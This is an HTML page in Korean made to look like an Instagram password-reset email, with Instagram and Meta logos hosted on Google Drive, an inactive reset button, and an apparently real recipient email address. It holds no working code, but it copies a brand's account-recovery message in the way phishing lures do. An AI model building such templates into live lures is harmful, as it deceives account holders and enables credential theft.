<html lang="ko">
<head>
  <meta charset="UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>비밀번호 설정</title>
  <link rel="stylesheet" type="text/css" href="css/resetPw.css">
</head>
<body>
<div class="wrap">
  <div>
    <img
            src="http://drive.google.com/uc?export=view&id=1oArh9BFHw1K2Gc5dsYzs_ZQMt6JAuQeE"
            alt="인스타그램이미지"
            id="insta"
    />
  </div>
  <p id="greet"><span>ky1107</span>님 안녕하세요.</p>
  <p id="content">
    Instagram 로그인과 관련하여 불편을 끼쳐 드려서 죄송합니다. 비밀번호를
    잊으셨나요? 회원님이 로그인한것이 맞다면 지금바로 비밀번호를 재설정 할
    수 있습니다.
  </p>
  <button id="button">비밀번호 재설정</button>
  <div id="metaDiv">
    <img
            src="http://drive.google.com/uc?export=view&id=1Max2S-mP-GpssexCdfo2obS4OYpcSqK-"
            alt="메타이미지"
            id="meta"
    />
  </div>
  <div id="mataMal">
    © Instagram. Meta Platforms, Inc., 1601 Willow Road, Menlo Park, CA
    94025
  </div>
  <div id="msg">
    이 메시지는 <span>kur6819@naver.com</span> 주소로
    <span>ky1107</span>님에게 전송된 메시지입니다. 회원님의 계정이 아닌가요?
    이 계정에서 회원님의 이메일을 삭제하세요.
  </div>
</div>
</body>
</html>
